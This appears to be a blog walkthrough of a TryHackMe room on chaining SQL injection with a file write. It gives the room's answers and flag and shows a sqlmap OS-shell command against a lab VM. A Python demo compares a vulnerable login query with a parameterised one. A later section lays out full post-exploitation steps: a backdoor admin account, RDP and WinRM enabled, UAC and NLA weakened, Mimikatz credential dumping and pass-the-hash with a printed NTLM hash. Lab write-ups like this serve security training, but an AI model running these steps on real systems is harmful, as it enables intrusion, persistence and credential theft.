TL;DR Walkthrough of the TryHackMe room Weaponizing Vulnerabilities.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
I am continuing to go through SDLC focused TryHackMe rooms as I'm studying for a college class on the topic. TryHackMe is doing a good job as always of making an otherwise dull topic fun and interesting. This room is about testing applications for vulnerabilities and showing how dangerous two of them become when combined. In isolation, neither SQLi nor an arbitrary file upload is good news, but neither is necessarily fatal. Security testing can show the impact of chaining them: here the injection point is used to write a file into the web root, which is what turns a login form into a command shell.
— — Task 1 — -
I have understood the basics and I’m ready to start the room.
No answer needed
— — Task 2 — -
What is the term for an exploit that is used to gain control of a system remotely?
remote exploit
— — Task 3 — -
A vulnerability not patched by the vendor and unknown to most people is called a?
0-day
What is a commonly used term for a demonstration that proves the exploitability of a newly discovered vulnerability?
Proof of Concept
What does a product manufacturer typically release to prevent a known vulnerability from being exploited by adversaries?
Patch
— — Task 4 — -
Can it take days, months, or even years to develop a 0-day exploit? (yea/nay)
Yea
An exploit developed once the vendor has released the patch is called?
n-day
— — Task 5 — -
What is the technique called to string together multiple exploits?
exploit chaining
After initial access to the system, the process for gaining higher access within the system is called?
Privilege Escalation
The step in which the adversary tries to maintain long time access to the system is called?
Persistence
— — Task 6 — -
What is the response when we enter email test@chatai.com’ as user email and password 123 in the login form?
undefined
Execute the command whoami, what is the output you receive?
sqlmap -u "http://10.10.15.253/ai/includes/user_login.php?email=test%40chatai.com&password=123" -p email --os-shell
Answer Yes to all of sqlmap's prompts, then select 4 for PHP when it asks for the web application language. sqlmap uses the injection to write a small PHP stager into the web root, so the commands it then runs execute with the web server's account. Once it is done we have a shell that accepts legacy cmd.exe commands; on this box that account is already NT AUTHORITY\SYSTEM, so no privilege escalation is needed.
whoami
nt authority\system
Have you noticed the file flag.txt in the web root directory? What is the flag value?
type flag.txt
THM{010101_PAWNED}
How many files are available in the C:\xampp\htdocs\img folder?
dir img
2
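To make the chain concrete, here is an added example (not the room's code and not the chatai app's PHP, which the walkthrough never shows) that models the login query in Python against an in-memory SQLite table. It reproduces the query shape that a single quote breaks, which is what the front end renders as undefined, shows a comment-terminated payload logging in as the first user, and shows that binding the parameters closes both holes. The table, user names and passwords are constructed for the demo.

```python
"""Added example: the chatai login query modelled in Python/SQLite.

Not the room's code or the app's PHP; it reproduces the query shape
that a single quote breaks and that sqlmap exploits. Schema, users and
passwords are constructed for the demo.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the chatai users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (email, password) VALUES (?, ?)",
        [("admin@chatai.com", "S3cret!"), ("alice@chatai.com", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> dict:
    """String-built query, the pattern behind the room's user_login.php.

    Returns {"user": email} on success, {"user": None} on a miss, and
    {"error": ...} when the injected input breaks the statement, which is
    the case the web front end reports as 'undefined'.
    """
    sql = (
        "SELECT email FROM users "
        f"WHERE email = '{email}' AND password = '{password}'"
    )
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # Unbalanced quote: the DB cannot parse the statement at all.
        return {"error": str(exc), "sql": sql}
    return {"user": row[0] if row else None, "sql": sql}


def login_fixed(conn: sqlite3.Connection, email: str, password: str) -> dict:
    """Same lookup with bound parameters: the input is data, never SQL."""
    row = conn.execute(
        "SELECT email FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return {"user": row[0] if row else None}


# The probe from Task 6, a classic comment-based bypass, and a real login.
PROBES = [
    ("test@chatai.com'", "123"),      # unbalanced quote -> parse error
    ("' OR 1=1 -- ", "123"),          # comments out the password check
    ("admin@chatai.com", "S3cret!"),  # legitimate credentials
]

if __name__ == "__main__":
    db = make_db()
    for email, pw in PROBES:
        print(f"input {email!r}")
        print("  vulnerable:", login_vulnerable(db, email, pw))
        print("  fixed:     ", login_fixed(db, email, pw))
```

Once the injection is confirmed, sqlmap's --os-shell on MySQL writes a small PHP stager into the web root through the same injection point (SELECT ... INTO OUTFILE), which is the file-upload half of the chain. That needs the database account to hold the FILE privilege and a writable, known web root; both evidently hold here, since the shell lands in C:\xampp\htdocs. The stager executes under the web server's account, which is why whoami returns NT AUTHORITY\SYSTEM without any privilege escalation.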
— — Task 7 — -
As a security engineer, is it important to ensure that automated scripts being executed are acquired from legitimate sources? (yea/nay)
Yea
— — Task 8 — -
I have completed the room.
No answer needed
— — Post Exploitation — -
THM didn’t ask us to do this, but here at test.local we are never happy with dodgy access to cmd.exe over a PHP shell. Therefore the first thing we did after running sqlmap:
- added a local admin for Mishky
- enabled winrm
- enabled RDP
- uploaded Mimikatz
- dumped the SAM, mscache, and Credential Manager
While still in that initial shell:
net user Mishky Password123 /add
net localgroup administrators Mishky /add
winrm quickconfig -force
We can now do a real login via WinRM
evil-winrm -i 10.10.15.253 -u Mishky -p Password123
Set-Location C:\xampp\htdocs
Get-Content .\flag.txt
(Get-ChildItem C:\xampp\htdocs\img).Count
#Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 ; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#set UAC to elevate admins without prompting (ConsentPromptBehaviorAdmin=0; EnableLUA stays on, so UAC is not fully off)
Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
#enable Restricted Admin mode (DisableRestrictedAdmin=0 turns it on), which is what allows RDP via PTH
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -force
#Disable NLA
$TargetMachine = $env:COMPUTERNAME ;
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetMachine -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
We can now RDP
xfreerdp /v:10.10.15.253 /u:Mishky /p:Password123 /dynamic-resolution
copy/paste Invoke-Mimikatz.ps1 to Desktop
. C:\Users\Mishky\Desktop\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::sam" "lsadump::cache" "vault::cred"'
We now have the Administrator’s NTLM.
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 007dad4df1dec3c3120462d45bf29682
— — Persistence — -
That NTLM wasn’t on crackstation, but no matter. We can easily PTH with evil-winrm and xfreerdp. This is handy if the VM shuts down and you forgot to jot down an answer to one or two questions. It happens to me all the time.
evil-winrm -i 10.10.64.197 -u Administrator -H 007dad4df1dec3c3120462d45bf29682
#enable Restricted Admin mode (DisableRestrictedAdmin=0 turns it on), which is what allows RDP via PTH
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -force
xfreerdp /v:10.10.64.197 /u:Administrator /pth:007dad4df1dec3c3120462d45bf29682
Summary
I find SDLC about as dull a topic as project management. I have had to memorize enough about the topic to pass CISSP or GSLC in the past, then I mostly forget it a week or two after the exam is thankfully over. Sadly I have to dredge the topic up again for my current college class. At least THM has been helping keep me from going into a coma while going over it.
Normally I’d include a reference section at the bottom, but all I used for this room besides THM’s instructions was our Master AD Cheatsheet.